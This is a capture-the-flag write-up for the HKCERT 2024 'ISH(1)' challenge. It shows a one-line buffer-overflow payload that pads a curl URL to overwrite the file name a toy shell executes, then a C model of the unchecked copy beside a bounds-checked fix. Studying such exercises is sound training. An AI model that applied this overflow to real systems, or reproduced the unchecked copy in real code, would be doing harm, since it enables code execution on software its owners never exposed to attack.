# Binary Exploitation

<table><thead><tr><th width="347">Challenge</th><th>Link</th></tr></thead><tbody><tr><td>ISH(1) (200 pts)</td><td><a href="#ish-1-200-pts">Here</a></td></tr></tbody></table>

## ISH(1) (200 pts)

### Description

Shell (a.k.a. sh) is a text-based interface where users can type commands to interact with the operating system. I'm trying to implement a shell using ISA; I call it ISH.

Note: This challenge is the first part of the ISH fullchain, execute flag1 file in ish to get the flag.

Note: ISH (1), ISH (2) and ISH (3) share the same environment, and it is recommended to solve the ISH fullchain challenges in order.

Note: Here is the [full documentation](https://hackmd.io/@blackb6a/bauhinia-isa) and [ISA interpreter source code](https://github.com/blackb6a/ISA-Engine) if you need more references.

* Challenge: [https://c58a-ish-1.hkcert24.pwnable.hk?id=2](https://c58a-ish-1.hkcert24.pwnable.hk/?id=2)
* Playground: [https://c58b-ish-2.hkcert24.pwnable.hk?id=1](https://c58b-ish-2.hkcert24.pwnable.hk/?id=1)

### Solution

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FVUS55DGcUdipZCDdChFx%2Fimage.png?alt=media&#x26;token=032d9002-cc71-4c6b-90a0-6d46a0df3814" alt=""><figcaption></figcaption></figure>

There is a buffer overflow in the URL argument of the `curl` command. With the overflow we can overwrite the filename of the binary that the `game` command executes. So the idea is to keep the `curl` URL valid despite the overflow, and to overwrite the filename with `flag1`. Below is my payload:

```bash
curl g.co#aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag1
game
```
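The bug class described above, modelled in C beside a bounds-checked version. This is an added example, not the challenge's ISA source. The buffer sizes, the adjacent layout, the default file name `game` and all function names are assumptions made for the model.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout (sizes constructed for this model, not taken from ISH):
   a URL buffer followed directly by the file name the `game` command runs. */
enum { URL_LEN = 16, FILE_OFF = 16, MEM_LEN = 24 };
typedef struct { char mem[MEM_LEN]; } shell_t;

static void shell_init(shell_t *s) {
    memset(s->mem, 0, MEM_LEN);
    memcpy(s->mem + FILE_OFF, "game", 5);   /* assumed default target */
}

static const char *game_target(const shell_t *s) { return s->mem + FILE_OFF; }

/* Vulnerable pattern: copy up to the terminator, never compare with URL_LEN.
   The clamp to MEM_LEN only keeps this model inside its own array. */
static void curl_unchecked(shell_t *s, const char *url) {
    size_t n = strlen(url) + 1;
    if (n > MEM_LEN) n = MEM_LEN;
    memcpy(s->mem, url, n);
    s->mem[MEM_LEN - 1] = '\0';
}

/* Hardened form: reject any URL that does not fit with its terminator. */
static int curl_checked(shell_t *s, const char *url) {
    size_t n = strlen(url);
    if (n >= URL_LEN) return -1;
    memcpy(s->mem, url, n + 1);
    return 0;
}

/* Constructed input: valid-looking URL, '#' padding up to URL_LEN, then a name. */
static void make_long_url(char out[URL_LEN + 6]) {
    memcpy(out, "g.co#", 5);
    memset(out + 5, 'a', URL_LEN - 5);
    memcpy(out + URL_LEN, "flag1", 6);
}

int main(void) {
    shell_t s; char url[URL_LEN + 6];
    make_long_url(url);
    shell_init(&s); curl_unchecked(&s, url);
    printf("unchecked: game runs '%s'\n", game_target(&s));
    shell_init(&s);
    printf("checked: rc=%d, game runs '%s'\n", curl_checked(&s, url), game_target(&s));
    return 0;
}
```

The fix is the length check before the copy: a URL that does not fit is rejected, so the neighbouring file name is never written.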

Flag:
